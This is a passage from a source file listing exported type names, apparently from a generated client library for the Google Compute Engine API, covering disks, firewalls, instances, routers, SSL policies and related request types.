"DeleteSignedUrlKeyBackendBucketRequest",
"DeleteSignedUrlKeyBackendServiceRequest",
"DeleteSnapshotRequest",
"DeleteSslCertificateRequest",
"DeleteSslPolicyRequest",
"DeleteSubnetworkRequest",
"DeleteTargetGrpcProxyRequest",
"DeleteTargetHttpProxyRequest",
"DeleteTargetHttpsProxyRequest",
"DeleteTargetInstanceRequest",
"DeleteTargetPoolRequest",
"DeleteTargetSslProxyRequest",
"DeleteTargetTcpProxyRequest",
"DeleteTargetVpnGatewayRequest",
"DeleteUrlMapRequest",
"DeleteVpnGatewayRequest",
"DeleteVpnTunnelRequest",
"DeleteZoneOperationRequest",
"DeleteZoneOperationResponse",
"Denied",
"DeprecateImageRequest",
"DeprecationStatus",
"DetachDiskInstanceRequest",
"DetachNetworkEndpointsGlobalNetworkEndpointGroupRequest",
"DetachNetworkEndpointsNetworkEndpointGroupRequest",
"DisableXpnHostProjectRequest",
"DisableXpnResourceProjectRequest",
"Disk",
"DiskAggregatedList",
"DiskInstantiationConfig",
"DiskList",
"DiskMoveRequest",
"DisksAddResourcePoliciesRequest",
"DisksRemoveResourcePoliciesRequest",
"DisksResizeRequest",
"DisksScopedList",
"DiskType",
"DiskTypeAggregatedList",
"DiskTypeList",
"DiskTypesScopedList",
"DisplayDevice",
"DistributionPolicy",
"DistributionPolicyZoneConfiguration",
"Duration",
"EnableXpnHostProjectRequest",
"EnableXpnResourceProjectRequest",
"Error",
"Errors",
"ExchangedPeeringRoute",
"ExchangedPeeringRoutesList",
"ExpandIpCidrRangeSubnetworkRequest",
"Expr",
"ExternalVpnGateway",
"ExternalVpnGatewayInterface",
"ExternalVpnGatewayList",
"FileContentBuffer",
"Firewall",
"FirewallList",
"FirewallLogConfig",
"FirewallPoliciesListAssociationsResponse",
"FirewallPolicy",
"FirewallPolicyAssociation",
"FirewallPolicyList",
"FirewallPolicyRule",
"FirewallPolicyRuleMatcher",
"FirewallPolicyRuleMatcherLayer4Config",
"FixedOrPercent",
"ForwardingRule",
"ForwardingRuleAggregatedList",
"ForwardingRuleList",
"ForwardingRuleReference",
"ForwardingRuleServiceDirectoryRegistration",
"ForwardingRulesScopedList",
"GetAcceleratorTypeRequest",
"GetAddressRequest",
"GetAssociationFirewallPolicyRequest",
"GetAutoscalerRequest",
"GetBackendBucketRequest",
"GetBackendServiceRequest",
"GetDiagnosticsInterconnectRequest",
"GetDiskRequest",
"GetDiskTypeRequest",
"GetEffectiveFirewallsInstanceRequest",
"GetEffectiveFirewallsNetworkRequest",
"GetExternalVpnGatewayRequest",
"GetFirewallPolicyRequest",
"GetFirewallRequest",
"GetForwardingRuleRequest",
"GetFromFamilyImageRequest",
"GetGlobalAddressRequest",
"GetGlobalForwardingRuleRequest",
"GetGlobalNetworkEndpointGroupRequest",
"GetGlobalOperationRequest",
"GetGlobalOrganizationOperationRequest",
"GetGlobalPublicDelegatedPrefixeRequest",
"GetGuestAttributesInstanceRequest",
"GetHealthBackendServiceRequest",
"GetHealthCheckRequest",
"GetHealthRegionBackendServiceRequest",
"GetHealthTargetPoolRequest",
"GetIamPolicyDiskRequest",
"GetIamPolicyFirewallPolicyRequest",
"GetIamPolicyImageRequest",
"GetIamPolicyInstanceRequest",
"GetIamPolicyInstanceTemplateRequest",
"GetIamPolicyLicenseRequest",
"GetIamPolicyNodeGroupRequest",
"GetIamPolicyNodeTemplateRequest",
"GetIamPolicyRegionDiskRequest",
"GetIamPolicyReservationRequest",
"GetIamPolicyResourcePolicyRequest",
"GetIamPolicyServiceAttachmentRequest",
"GetIamPolicySnapshotRequest",
"GetIamPolicySubnetworkRequest",
"GetImageFamilyViewRequest",
"GetImageRequest",
"GetInstanceGroupManagerRequest",
"GetInstanceGroupRequest",
"GetInstanceRequest",
"GetInstanceTemplateRequest",
"GetInterconnectAttachmentRequest",
"GetInterconnectLocationRequest",
"GetInterconnectRequest",
"GetLicenseCodeRequest",
"GetLicenseRequest",
"GetMachineTypeRequest",
"GetNatMappingInfoRoutersRequest",
"GetNetworkEndpointGroupRequest",
"GetNetworkRequest",
"GetNodeGroupRequest",
"GetNodeTemplateRequest",
"GetNodeTypeRequest",
"GetPacketMirroringRequest",
"GetProjectRequest",
"GetPublicAdvertisedPrefixeRequest",
"GetPublicDelegatedPrefixeRequest",
"GetRegionAutoscalerRequest",
"GetRegionBackendServiceRequest",
"GetRegionCommitmentRequest",
"GetRegionDiskRequest",
"GetRegionDiskTypeRequest",
"GetRegionHealthCheckRequest",
"GetRegionHealthCheckServiceRequest",
"GetRegionInstanceGroupManagerRequest",
"GetRegionInstanceGroupRequest",
"GetRegionNetworkEndpointGroupRequest",
"GetRegionNotificationEndpointRequest",
"GetRegionOperationRequest",
"GetRegionRequest",
"GetRegionSslCertificateRequest",
"GetRegionTargetHttpProxyRequest",
"GetRegionTargetHttpsProxyRequest",
"GetRegionUrlMapRequest",
"GetReservationRequest",
"GetResourcePolicyRequest",
"GetRouteRequest",
"GetRouterRequest",
"GetRouterStatusRouterRequest",
"GetRuleFirewallPolicyRequest",
"GetRuleSecurityPolicyRequest",
"GetScreenshotInstanceRequest",
"GetSecurityPolicyRequest",
"GetSerialPortOutputInstanceRequest",
"GetServiceAttachmentRequest",
"GetShieldedInstanceIdentityInstanceRequest",
"GetSnapshotRequest",
"GetSslCertificateRequest",
"GetSslPolicyRequest",
"GetStatusVpnGatewayRequest",
"GetSubnetworkRequest",
"GetTargetGrpcProxyRequest",
"GetTargetHttpProxyRequest",
"GetTargetHttpsProxyRequest",
"GetTargetInstanceRequest",
"GetTargetPoolRequest",
"GetTargetSslProxyRequest",
"GetTargetTcpProxyRequest",
"GetTargetVpnGatewayRequest",
"GetUrlMapRequest",
"GetVpnGatewayRequest",
"GetVpnTunnelRequest",
"GetXpnHostProjectRequest",
"GetXpnResourcesProjectsRequest",
"GetZoneOperationRequest",
"GetZoneRequest",
"GlobalNetworkEndpointGroupsAttachEndpointsRequest",
"GlobalNetworkEndpointGroupsDetachEndpointsRequest",
"GlobalOrganizationSetPolicyRequest",
"GlobalSetLabelsRequest",
"GlobalSetPolicyRequest",
"GRPCHealthCheck",
"GuestAttributes",
"GuestAttributesEntry",
"GuestAttributesValue",
"GuestOsFeature",
"HealthCheck",
"HealthCheckList",
"HealthCheckLogConfig",
"HealthCheckReference",
"HealthChecksAggregatedList",
"HealthCheckService",
"HealthCheckServiceReference",
"HealthCheckServicesList",
"HealthChecksScopedList",
"HealthStatus",
"HealthStatusForNetworkEndpoint",
"HostRule",
"HTTP2HealthCheck",
"HttpFaultAbort",
"HttpFaultDelay",
"HttpFaultInjection",
"HttpHeaderAction",
"HttpHeaderMatch",
"HttpHeaderOption",
"HTTPHealthCheck",
"HttpQueryParameterMatch",
"HttpRedirectAction",
"HttpRetryPolicy",
"HttpRouteAction",
"HttpRouteRule",
"HttpRouteRuleMatch",
"HTTPSHealthCheck",
"Image",
"ImageFamilyView",
"ImageList",
"InitialStateConfig",
"InsertAddressRequest",
"InsertAutoscalerRequest",
"InsertBackendBucketRequest",
"InsertBackendServiceRequest",
"InsertDiskRequest",
"InsertExternalVpnGatewayRequest",
"InsertFirewallPolicyRequest",
"InsertFirewallRequest",
"InsertForwardingRuleRequest",
"InsertGlobalAddressRequest",
"InsertGlobalForwardingRuleRequest",
"InsertGlobalNetworkEndpointGroupRequest",
"InsertGlobalPublicDelegatedPrefixeRequest",
"InsertHealthCheckRequest",
"InsertImageRequest",
"InsertInstanceGroupManagerRequest",
"InsertInstanceGroupRequest",
"InsertInstanceRequest",
"InsertInstanceTemplateRequest",
"InsertInterconnectAttachmentRequest",
"InsertInterconnectRequest",
"InsertLicenseRequest",
"InsertNetworkEndpointGroupRequest",
"InsertNetworkRequest",
"InsertNodeGroupRequest",
"InsertNodeTemplateRequest",
"InsertPacketMirroringRequest",
"InsertPublicAdvertisedPrefixeRequest",
"InsertPublicDelegatedPrefixeRequest",
"InsertRegionAutoscalerRequest",
"InsertRegionBackendServiceRequest",
"InsertRegionCommitmentRequest",
"InsertRegionDiskRequest",
"InsertRegionHealthCheckRequest",
"InsertRegionHealthCheckServiceRequest",
"InsertRegionInstanceGroupManagerRequest",
"InsertRegionNetworkEndpointGroupRequest",
"InsertRegionNotificationEndpointRequest",
"InsertRegionSslCertificateRequest",
"InsertRegionTargetHttpProxyRequest",
"InsertRegionTargetHttpsProxyRequest",
"InsertRegionUrlMapRequest",
"InsertReservationRequest",
"InsertResourcePolicyRequest",
"InsertRouteRequest",
"InsertRouterRequest",
"InsertSecurityPolicyRequest",
"InsertServiceAttachmentRequest",
"InsertSslCertificateRequest",
"InsertSslPolicyRequest",
"InsertSubnetworkRequest",
"InsertTargetGrpcProxyRequest",
"InsertTargetHttpProxyRequest",
"InsertTargetHttpsProxyRequest",
"InsertTargetInstanceRequest",
"InsertTargetPoolRequest",
"InsertTargetSslProxyRequest",
"InsertTargetTcpProxyRequest",
"InsertTargetVpnGatewayRequest",
"InsertUrlMapRequest",
"InsertVpnGatewayRequest",
"InsertVpnTunnelRequest",
"Instance",
"InstanceAggregatedList",
"InstanceGroup",
"InstanceGroupAggregatedList",
"InstanceGroupList",
"InstanceGroupManager",
"InstanceGroupManagerActionsSummary",
"InstanceGroupManagerAggregatedList",
"InstanceGroupManagerAutoHealingPolicy",
"InstanceGroupManagerList",
"InstanceGroupManagersAbandonInstancesRequest",
"InstanceGroupManagersApplyUpdatesRequest",
"InstanceGroupManagersCreateInstancesRequest",
"InstanceGroupManagersDeleteInstancesRequest",
"InstanceGroupManagersDeletePerInstanceConfigsReq",
"InstanceGroupManagersListErrorsResponse",
"InstanceGroupManagersListManagedInstancesResponse",
"InstanceGroupManagersListPerInstanceConfigsResp",
"InstanceGroupManagersPatchPerInstanceConfigsReq",
"InstanceGroupManagersRecreateInstancesRequest",
"InstanceGroupManagersScopedList",
"InstanceGroupManagersSetInstanceTemplateRequest",
"InstanceGroupManagersSetTargetPoolsRequest",
"InstanceGroupManagerStatus",
"InstanceGroupManagerStatusStateful",
"InstanceGroupManagerStatusStatefulPerInstanceConfigs",
"InstanceGroupManagerStatusVersionTarget",
"InstanceGroupManagersUpdatePerInstanceConfigsReq",
"InstanceGroupManagerUpdatePolicy",
"InstanceGroupManagerVersion",
"InstanceGroupsAddInstancesRequest",
"InstanceGroupsListInstances",
"InstanceGroupsListInstancesRequest",
"InstanceGroupsRemoveInstancesRequest",
"InstanceGroupsScopedList",
"InstanceGroupsSetNamedPortsRequest",
"InstanceList",
"InstanceListReferrers",
"InstanceManagedByIgmError",
"InstanceManagedByIgmErrorInstanceActionDetails",
"InstanceManagedByIgmErrorManagedInstanceError",
"InstanceMoveRequest",
"InstanceProperties",
"InstanceReference",
"InstancesAddResourcePoliciesRequest",
"InstancesGetEffectiveFirewallsResponse",
"InstancesGetEffectiveFirewallsResponseEffectiveFirewallPolicy",
"InstancesRemoveResourcePoliciesRequest",
"InstancesScopedList",
"InstancesSetLabelsRequest",
"InstancesSetMachineResourcesRequest",
"InstancesSetMachineTypeRequest",
"InstancesSetMinCpuPlatformRequest",
"InstancesSetServiceAccountRequest",
"InstancesStartWithEncryptionKeyRequest",
"InstanceTemplate",
"InstanceTemplateList",
"InstanceWithNamedPorts",
"Int64RangeMatch",
"Interconnect",
"InterconnectAttachment",
"InterconnectAttachmentAggregatedList",
"InterconnectAttachmentList",
"InterconnectAttachmentPartnerMetadata",
"InterconnectAttachmentPrivateInfo",
"InterconnectAttachmentsScopedList",
"InterconnectCircuitInfo",
"InterconnectDiagnostics",
"InterconnectDiagnosticsARPEntry",
"InterconnectDiagnosticsLinkLACPStatus",
"InterconnectDiagnosticsLinkOpticalPower",
"InterconnectDiagnosticsLinkStatus",
"InterconnectList",
"InterconnectLocation",
"InterconnectLocationList",
"InterconnectLocationRegionInfo",
"InterconnectOutageNotification",
"InterconnectsGetDiagnosticsResponse",
"InvalidateCacheUrlMapRequest",
"Items",
"License",
"LicenseCode",
"LicenseCodeLicenseAlias",
"LicenseResourceCommitment",
"LicenseResourceRequirements",
"LicensesListResponse",
"ListAcceleratorTypesRequest",
"ListAddressesRequest",
"ListAssociationsFirewallPolicyRequest",
"ListAutoscalersRequest",
"ListAvailableFeaturesSslPoliciesRequest",
"ListBackendBucketsRequest",
"ListBackendServicesRequest",
"ListDisksRequest",
"ListDiskTypesRequest",
"ListErrorsInstanceGroupManagersRequest",
"ListErrorsRegionInstanceGroupManagersRequest",
"ListExternalVpnGatewaysRequest",
"ListFirewallPoliciesRequest",
"ListFirewallsRequest",
"ListForwardingRulesRequest",
"ListGlobalAddressesRequest",
"ListGlobalForwardingRulesRequest",
"ListGlobalNetworkEndpointGroupsRequest",
"ListGlobalOperationsRequest",
"ListGlobalOrganizationOperationsRequest",
"ListGlobalPublicDelegatedPrefixesRequest",
"ListHealthChecksRequest",
"ListImagesRequest",
"ListInstanceGroupManagersRequest",
"ListInstanceGroupsRequest",
"ListInstancesInstanceGroupsRequest",
"ListInstancesRegionInstanceGroupsRequest",
"ListInstancesRequest",
"ListInstanceTemplatesRequest",
"ListInterconnectAttachmentsRequest",
"ListInterconnectLocationsRequest",
"ListInterconnectsRequest",
"ListLicensesRequest",
"ListMachineTypesRequest",
"ListManagedInstancesInstanceGroupManagersRequest",
"ListManagedInstancesRegionInstanceGroupManagersRequest",
"ListNetworkEndpointGroupsRequest",
"ListNetworkEndpointsGlobalNetworkEndpointGroupsRequest",
"ListNetworkEndpointsNetworkEndpointGroupsRequest",
"ListNetworksRequest",
"ListNodeGroupsRequest",
"ListNodesNodeGroupsRequest",
"ListNodeTemplatesRequest",
"ListNodeTypesRequest",
"ListPacketMirroringsRequest",
"ListPeeringRoutesNetworksRequest",
"ListPerInstanceConfigsInstanceGroupManagersRequest",
"ListPerInstanceConfigsRegionInstanceGroupManagersRequest",
"ListPreconfiguredExpressionSetsSecurityPoliciesRequest",
"ListPublicAdvertisedPrefixesRequest",
"ListPublicDelegatedPrefixesRequest",
"ListReferrersInstancesRequest",
"ListRegionAutoscalersRequest",
"ListRegionBackendServicesRequest",
"ListRegionCommitmentsRequest",
"ListRegionDisksRequest",
"ListRegionDiskTypesRequest",
"ListRegionHealthCheckServicesRequest",
"ListRegionHealthChecksRequest",
"ListRegionInstanceGroupManagersRequest",
"ListRegionInstanceGroupsRequest",
"ListRegionNetworkEndpointGroupsRequest",
"ListRegionNotificationEndpointsRequest",
"ListRegionOperationsRequest",
"ListRegionsRequest",
"ListRegionSslCertificatesRequest",
"ListRegionTargetHttpProxiesRequest",
"ListRegionTargetHttpsProxiesRequest",
"ListRegionUrlMapsRequest",
"ListReservationsRequest",
"ListResourcePoliciesRequest",
"ListRoutersRequest",
"ListRoutesRequest",
"ListSecurityPoliciesRequest",
"ListServiceAttachmentsRequest",
"ListSnapshotsRequest",
"ListSslCertificatesRequest",
"ListSslPoliciesRequest",
"ListSubnetworksRequest",
"ListTargetGrpcProxiesRequest",
"ListTargetHttpProxiesRequest",
"ListTargetHttpsProxiesRequest",
"ListTargetInstancesRequest",
"ListTargetPoolsRequest",
"ListTargetSslProxiesRequest",
"ListTargetTcpProxiesRequest",
"ListTargetVpnGatewaysRequest",
"ListUrlMapsRequest",
"ListUsableSubnetworksRequest",
"ListVpnGatewaysRequest",
"ListVpnTunnelsRequest",
"ListXpnHostsProjectsRequest",
"ListZoneOperationsRequest",
"ListZonesRequest",
"LocalDisk",
"LocationPolicy",
"LocationPolicyLocation",
"LogConfig",
"LogConfigCloudAuditOptions",
"LogConfigCounterOptions",
"LogConfigCounterOptionsCustomField",
"LogConfigDataAccessOptions",
"MachineType",
"MachineTypeAggregatedList",
"MachineTypeList",
"MachineTypesScopedList",
"ManagedInstance",
"ManagedInstanceInstanceHealth",
"ManagedInstanceLastAttempt",
"ManagedInstanceVersion",
"Metadata",
"MetadataFilter",
"MetadataFilterLabelMatch",
"MoveDiskProjectRequest",
"MoveFirewallPolicyRequest",
"MoveInstanceProjectRequest",
"NamedPort",
"Network",
"NetworkEndpoint",
"NetworkEndpointGroup",
"NetworkEndpointGroupAggregatedList",
"NetworkEndpointGroupAppEngine",
"NetworkEndpointGroupCloudFunction",
"NetworkEndpointGroupCloudRun",
"NetworkEndpointGroupList",
"NetworkEndpointGroupsAttachEndpointsRequest",
"NetworkEndpointGroupsDetachEndpointsRequest",
"NetworkEndpointGroupsListEndpointsRequest",
"NetworkEndpointGroupsListNetworkEndpoints",
"NetworkEndpointGroupsScopedList",
"NetworkEndpointWithHealthStatus",
"NetworkInterface",
"NetworkList",
"NetworkPeering",
"NetworkRoutingConfig",
"NetworksAddPeeringRequest",
"NetworksGetEffectiveFirewallsResponse",
"NetworksGetEffectiveFirewallsResponseEffectiveFirewallPolicy",
"NetworksRemovePeeringRequest",
"NetworksUpdatePeeringRequest",
"NodeGroup",
"NodeGroupAggregatedList",
"NodeGroupAutoscalingPolicy",
"NodeGroupList",
"NodeGroupMaintenanceWindow",
"NodeGroupNode",
"NodeGroupsAddNodesRequest",
"NodeGroupsDeleteNodesRequest",
"NodeGroupsListNodes",
"NodeGroupsScopedList",
"NodeGroupsSetNodeTemplateRequest",
"NodeTemplate",
"NodeTemplateAggregatedList",
"NodeTemplateList",
"NodeTemplateNodeTypeFlexibility",
"NodeTemplatesScopedList",
"NodeType",
"NodeTypeAggregatedList",
"NodeTypeList",
"NodeTypesScopedList",
"NotificationEndpoint",
"NotificationEndpointGrpcSettings",
"NotificationEndpointList",
"Operation",
"OperationAggregatedList",
"OperationList",
"OperationsScopedList",
"OutlierDetection",
"PacketMirroring",
"PacketMirroringAggregatedList",
"PacketMirroringFilter",
"PacketMirroringForwardingRuleInfo",
"PacketMirroringList",
"PacketMirroringMirroredResourceInfo",
"PacketMirroringMirroredResourceInfoInstanceInfo",
"PacketMirroringMirroredResourceInfoSubnetInfo",
"PacketMirroringNetworkInfo",
"PacketMirroringsScopedList",
"PatchAutoscalerRequest",
"PatchBackendBucketRequest",
"PatchBackendServiceRequest",
"PatchFirewallPolicyRequest",
"PatchFirewallRequest",
"PatchForwardingRuleRequest",
"PatchGlobalForwardingRuleRequest",
"PatchGlobalPublicDelegatedPrefixeRequest",
"PatchHealthCheckRequest",
"PatchImageRequest",
"PatchInstanceGroupManagerRequest",
"PatchInterconnectAttachmentRequest",
"PatchInterconnectRequest",
"PatchNetworkRequest",
"PatchNodeGroupRequest",
"PatchPacketMirroringRequest",
"PatchPerInstanceConfigsInstanceGroupManagerRequest",
"PatchPerInstanceConfigsRegionInstanceGroupManagerRequest",
"PatchPublicAdvertisedPrefixeRequest",
"PatchPublicDelegatedPrefixeRequest",
"PatchRegionAutoscalerRequest",
"PatchRegionBackendServiceRequest",
"PatchRegionHealthCheckRequest",
"PatchRegionHealthCheckServiceRequest",
"PatchRegionInstanceGroupManagerRequest",
"PatchRegionUrlMapRequest",
"PatchRouterRequest",
"PatchRuleFirewallPolicyRequest",
"PatchRuleSecurityPolicyRequest",
"PatchSecurityPolicyRequest",
"PatchServiceAttachmentRequest",
"PatchSslPolicyRequest",
"PatchSubnetworkRequest",
"PatchTargetGrpcProxyRequest",
"PatchTargetHttpProxyRequest",
"PatchTargetHttpsProxyRequest",
"PatchUrlMapRequest",
"PathMatcher",
"PathRule",
"PerInstanceConfig",
"Policy",
"PreconfiguredWafSet",
"PreservedState",
"PreservedStatePreservedDisk",
"PreviewRouterRequest",
"Project",
"ProjectsDisableXpnResourceRequest",
"ProjectsEnableXpnResourceRequest",
"ProjectsGetXpnResources",
"ProjectsListXpnHostsRequest",
"ProjectsSetDefaultNetworkTierRequest",
"PublicAdvertisedPrefix",
"PublicAdvertisedPrefixList",
"PublicAdvertisedPrefixPublicDelegatedPrefix",
"PublicDelegatedPrefix",
"PublicDelegatedPrefixAggregatedList",
"PublicDelegatedPrefixesScopedList",
"PublicDelegatedPrefixList",
"PublicDelegatedPrefixPublicDelegatedSubPrefix",
"Quota",
"RawDisk",
"RecreateInstancesInstanceGroupManagerRequest",
"RecreateInstancesRegionInstanceGroupManagerRequest",
"Reference",
"Region",
"RegionAutoscalerList",
"RegionDisksAddResourcePoliciesRequest",
"RegionDisksRemoveResourcePoliciesRequest",
"RegionDisksResizeRequest",
"RegionDiskTypeList",
"RegionInstanceGroupList",
"RegionInstanceGroupManagerDeleteInstanceConfigReq",
"RegionInstanceGroupManagerList",
"RegionInstanceGroupManagerPatchInstanceConfigReq",
"RegionInstanceGroupManagersAbandonInstancesRequest",
"RegionInstanceGroupManagersApplyUpdatesRequest",
"RegionInstanceGroupManagersCreateInstancesRequest",
"RegionInstanceGroupManagersDeleteInstancesRequest",
"RegionInstanceGroupManagersListErrorsResponse",
"RegionInstanceGroupManagersListInstanceConfigsResp",
"RegionInstanceGroupManagersListInstancesResponse",
"RegionInstanceGroupManagersRecreateRequest",
"RegionInstanceGroupManagersSetTargetPoolsRequest",
"RegionInstanceGroupManagersSetTemplateRequest",
"RegionInstanceGroupManagerUpdateInstanceConfigReq",
"RegionInstanceGroupsListInstances",
"RegionInstanceGroupsListInstancesRequest",
"RegionInstanceGroupsSetNamedPortsRequest",
"RegionList",
"RegionSetLabelsRequest",
"RegionSetPolicyRequest",
"RegionTargetHttpsProxiesSetSslCertificatesRequest",
"RegionUrlMapsValidateRequest",
"RemoveAssociationFirewallPolicyRequest",
"RemoveHealthCheckTargetPoolRequest",
"RemoveInstancesInstanceGroupRequest",
"RemoveInstanceTargetPoolRequest",
"RemovePeeringNetworkRequest",
"RemoveResourcePoliciesDiskRequest",
"RemoveResourcePoliciesInstanceRequest",
"RemoveResourcePoliciesRegionDiskRequest",
"RemoveRuleFirewallPolicyRequest",
"RemoveRuleSecurityPolicyRequest",
"RequestMirrorPolicy",
"Reservation",
"ReservationAffinity",
"ReservationAggregatedList",
"ReservationList",
"ReservationsResizeRequest",
"ReservationsScopedList",
"ResetInstanceRequest",
"ResizeDiskRequest",
"ResizeInstanceGroupManagerRequest",
"ResizeRegionDiskRequest",
"ResizeRegionInstanceGroupManagerRequest",
"ResizeReservationRequest",
"ResourceCommitment",
"ResourceGroupReference",
"ResourcePoliciesScopedList",
"ResourcePolicy",
"ResourcePolicyAggregatedList",
"ResourcePolicyDailyCycle",
"ResourcePolicyGroupPlacementPolicy",
"ResourcePolicyHourlyCycle",
"ResourcePolicyInstanceSchedulePolicy",
"ResourcePolicyInstanceSchedulePolicySchedule",
"ResourcePolicyList",
"ResourcePolicyResourceStatus",
"ResourcePolicyResourceStatusInstanceSchedulePolicyStatus",
"ResourcePolicySnapshotSchedulePolicy",
"ResourcePolicySnapshotSchedulePolicyRetentionPolicy",
"ResourcePolicySnapshotSchedulePolicySchedule",
"ResourcePolicySnapshotSchedulePolicySnapshotProperties",
"ResourcePolicyWeeklyCycle",
"ResourcePolicyWeeklyCycleDayOfWeek",
"Route",
"RouteAsPath",
"RouteList",
"Router",
"RouterAdvertisedIpRange",
"RouterAggregatedList",
"RouterBgp",
"RouterBgpPeer",
"RouterBgpPeerBfd",
"RouterInterface",
"RouterList",
"RouterNat",
"RouterNatLogConfig",
"RouterNatRule",
"RouterNatRuleAction",
"RouterNatSubnetworkToNat",
"RoutersPreviewResponse",
"RoutersScopedList",
"RouterStatus",
"RouterStatusBgpPeerStatus",
"RouterStatusNatStatus",
"RouterStatusNatStatusNatRuleStatus",
"RouterStatusResponse",
"Rule",
"ScalingScheduleStatus",
"Scheduling",
"SchedulingNodeAffinity",
"ScratchDisks",
"Screenshot",
"SecurityPoliciesListPreconfiguredExpressionSetsResponse",
"SecurityPoliciesWafConfig",
"SecurityPolicy",
"SecurityPolicyAdaptiveProtectionConfig",
"SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfig",
"SecurityPolicyAdvancedOptionsConfig",
"SecurityPolicyList",
"SecurityPolicyReference",
"SecurityPolicyRule",
"SecurityPolicyRuleMatcher",
"SecurityPolicyRuleMatcherConfig",
"SecuritySettings",
"SendDiagnosticInterruptInstanceRequest",
"SendDiagnosticInterruptInstanceResponse",
"SerialPortOutput",
"ServerBinding",
"ServiceAccount",
"ServiceAttachment",
"ServiceAttachmentAggregatedList",
"ServiceAttachmentConnectedEndpoint",
"ServiceAttachmentConsumerProjectLimit",
"ServiceAttachmentList",
"ServiceAttachmentsScopedList",
"SetBackendServiceTargetSslProxyRequest",
"SetBackendServiceTargetTcpProxyRequest",
"SetBackupTargetPoolRequest",
"SetCommonInstanceMetadataProjectRequest",
"SetDefaultNetworkTierProjectRequest",
"SetDeletionProtectionInstanceRequest",
"SetDiskAutoDeleteInstanceRequest",
"SetIamPolicyDiskRequest",
"SetIamPolicyFirewallPolicyRequest",
"SetIamPolicyImageRequest",
"SetIamPolicyInstanceRequest",
"SetIamPolicyInstanceTemplateRequest",
"SetIamPolicyLicenseRequest",
"SetIamPolicyNodeGroupRequest",
"SetIamPolicyNodeTemplateRequest",
"SetIamPolicyRegionDiskRequest",
"SetIamPolicyReservationRequest",
"SetIamPolicyResourcePolicyRequest",
"SetIamPolicyServiceAttachmentRequest",
"SetIamPolicySnapshotRequest",
"SetIamPolicySubnetworkRequest",
"SetInstanceTemplateInstanceGroupManagerRequest",
"SetInstanceTemplateRegionInstanceGroupManagerRequest",
"SetLabelsDiskRequest",
"SetLabelsExternalVpnGatewayRequest",
"SetLabelsForwardingRuleRequest",
"SetLabelsGlobalForwardingRuleRequest",
"SetLabelsImageRequest",
"SetLabelsInstanceRequest",
"SetLabelsRegionDiskRequest",
"SetLabelsSnapshotRequest",
"SetLabelsVpnGatewayRequest",
"SetMachineResourcesInstanceRequest",
"SetMachineTypeInstanceRequest",
"SetMetadataInstanceRequest",
"SetMinCpuPlatformInstanceRequest",
"SetNamedPortsInstanceGroupRequest",
"SetNamedPortsRegionInstanceGroupRequest",
"SetNodeTemplateNodeGroupRequest",
"SetPrivateIpGoogleAccessSubnetworkRequest",
"SetProxyHeaderTargetSslProxyRequest",
"SetProxyHeaderTargetTcpProxyRequest",
"SetQuicOverrideTargetHttpsProxyRequest",
"SetSchedulingInstanceRequest",
"SetSecurityPolicyBackendServiceRequest",
"SetServiceAccountInstanceRequest",
"SetShieldedInstanceIntegrityPolicyInstanceRequest",
"SetSslCertificatesRegionTargetHttpsProxyRequest",
"SetSslCertificatesTargetHttpsProxyRequest",
"SetSslCertificatesTargetSslProxyRequest",
"SetSslPolicyTargetHttpsProxyRequest",
"SetSslPolicyTargetSslProxyRequest",
"SetTagsInstanceRequest",
"SetTargetForwardingRuleRequest",
"SetTargetGlobalForwardingRuleRequest",
"SetTargetPoolsInstanceGroupManagerRequest",
"SetTargetPoolsRegionInstanceGroupManagerRequest",
"SetUrlMapRegionTargetHttpProxyRequest",
"SetUrlMapRegionTargetHttpsProxyRequest",
"SetUrlMapTargetHttpProxyRequest",
"SetUrlMapTargetHttpsProxyRequest",
"SetUsageExportBucketProjectRequest",
"ShieldedInstanceConfig",
"ShieldedInstanceIdentity",
"ShieldedInstanceIdentityEntry",
"ShieldedInstanceIntegrityPolicy",
"SignedUrlKey",
"SimulateMaintenanceEventInstanceRequest",
"Snapshot",
"SnapshotList",
"SourceInstanceParams",
"SslCertificate",
"SslCertificateAggregatedList",
"SslCertificateList",
"SslCertificateManagedSslCertificate",
"SslCertificateSelfManagedSslCertificate",
"SslCertificatesScopedList",
"SSLHealthCheck",
"SslPoliciesList",
"SslPoliciesListAvailableFeaturesResponse",
"SslPolicy",
"SslPolicyReference",
"StartInstanceRequest",
"StartWithEncryptionKeyInstanceRequest",
"StatefulPolicy",
"StatefulPolicyPreservedState",
"StatefulPolicyPreservedStateDiskDevice",
"StopInstanceRequest",
"Subnetwork",
"SubnetworkAggregatedList",
"SubnetworkList",
"SubnetworkLogConfig",
"SubnetworkSecondaryRange",
"SubnetworksExpandIpCidrRangeRequest",
"SubnetworksScopedList",
"SubnetworksSetPrivateIpGoogleAccessRequest",
"Subsetting",
"SwitchToCustomModeNetworkRequest",
"Tags",
"TargetGrpcProxy",
"TargetGrpcProxyList",
"TargetHttpProxiesScopedList",
"TargetHttpProxy",
"TargetHttpProxyAggregatedList",
"TargetHttpProxyList",
"TargetHttpsProxiesScopedList",
"TargetHttpsProxiesSetQuicOverrideRequest",
"TargetHttpsProxiesSetSslCertificatesRequest",
"TargetHttpsProxy",
"TargetHttpsProxyAggregatedList",
"TargetHttpsProxyList",
"TargetInstance",
"TargetInstanceAggregatedList",
"TargetInstanceList",
"TargetInstancesScopedList",
"TargetPool",
"TargetPoolAggregatedList",
"TargetPoolInstanceHealth",
"TargetPoolList",
"TargetPoolsAddHealthCheckRequest",
"TargetPoolsAddInstanceRequest",
"TargetPoolsRemoveHealthCheckRequest",
"TargetPoolsRemoveInstanceRequest",
"TargetPoolsScopedList",
"TargetReference",
"TargetSslProxiesSetBackendServiceRequest",
"TargetSslProxiesSetProxyHeaderRequest",
"TargetSslProxiesSetSslCertificatesRequest",
"TargetSslProxy",
"TargetSslProxyList",
"TargetTcpProxiesSetBackendServiceRequest",
"TargetTcpProxiesSetProxyHeaderRequest",
"TargetTcpProxy",
"TargetTcpProxyList",
"TargetVpnGateway",
"TargetVpnGatewayAggregatedList",
"TargetVpnGatewayList",
"TargetVpnGatewaysScopedList",
"TCPHealthCheck",
"TestFailure",
"TestIamPermissionsDiskRequest",
"TestIamPermissionsExternalVpnGatewayRequest",
"TestIamPermissionsFirewallPolicyRequest",
"TestIamPermissionsImageRequest",
"TestIamPermissionsInstanceRequest",
"TestIamPermissionsInstanceTemplateRequest",
"TestIamPermissionsLicenseCodeRequest",
"TestIamPermissionsLicenseRequest",
"TestIamPermissionsNetworkEndpointGroupRequest",
"TestIamPermissionsNodeGroupRequest",
"TestIamPermissionsNodeTemplateRequest",
"TestIamPermissionsPacketMirroringRequest",
